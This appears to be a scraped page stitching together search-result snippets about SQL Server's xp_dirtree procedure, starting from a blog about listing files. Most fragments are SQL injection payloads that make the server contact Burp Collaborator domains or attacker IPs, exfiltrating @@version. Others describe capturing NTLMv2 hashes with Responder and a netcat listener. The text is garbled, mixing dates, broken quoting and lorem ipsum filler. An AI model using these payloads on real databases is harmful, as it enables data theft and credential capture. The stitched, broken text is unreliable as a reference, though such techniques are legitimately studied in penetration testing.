12/31/2012 · UPDATED — Dec 31, 2012 — Be sure to read Part 2 of this post discussing xp_dirtree.. Last week I blogged about how to use an undocumented stored procedures to create folders. This week we need to do the opposite. We need to get a list of all files from a subfolder in order to process them.
SUBSTRING(@@version,1,9))+’.burpcollaborator.netfoo’ exec master.dbo.xp_dirtree@q –Data Exfiltration using SQL Case Study: Data Exfiltration using XML Extensible MarkupLanguage (XML) is a markup language that defines a set of rules for encoding documents, 6/12/2017 · ‘ declare @q varchar (99) set @q = ‘\subdomain provided by collabrator .burpcollab’ + ‘orator.netpyg’ exec master.dbo.xp _dirtree @q — While using.
6/22/2019 · declare @q varchar(200) set @q =’\10.10.14.33Hello’ exec master.dbo.xp _dirtree @q What this is doing is setting @q to be a string with max characters of 200. Then we set q to our box IP with any folder. Then we execute the dirtree command with the function of q . At the same time, we set up a nc on port 445 (smb port).
SQL> declare @q varchar(200)set @q =’\10.10.12.137fake’+(SELECT SUBSTRING(@@version,1,9)) exec master.dbo.xp _dirtree @q Excellent, so from this we know a connection can be made back to our machine. Utilising responder by Laurent Gaffie, we can capture this authentication attempt including the NTLMv2 hash by pretending to be a valid SMB server.
6/22/2019 · A) First of all, you are using tamper script substr2lr for unknown reason. B) Second of all you are using results from Burp’s collaborator. I would suggest you to continue with Burp in this case as it is the tool that gave you a true positive finding in the first place, GitHub Gist: star and fork jonasonline’s gists by creating an account on GitHub.
Tentang lorem ipsum dolor sit ametdeclare @q varchar(99)set @q =’\mj9ty325cb80f5zen5ht6rjkobu4iw6nwboyim7.burpcollab’+’orator.netlcv’ exec master.dbo.xp _dirtree @q —
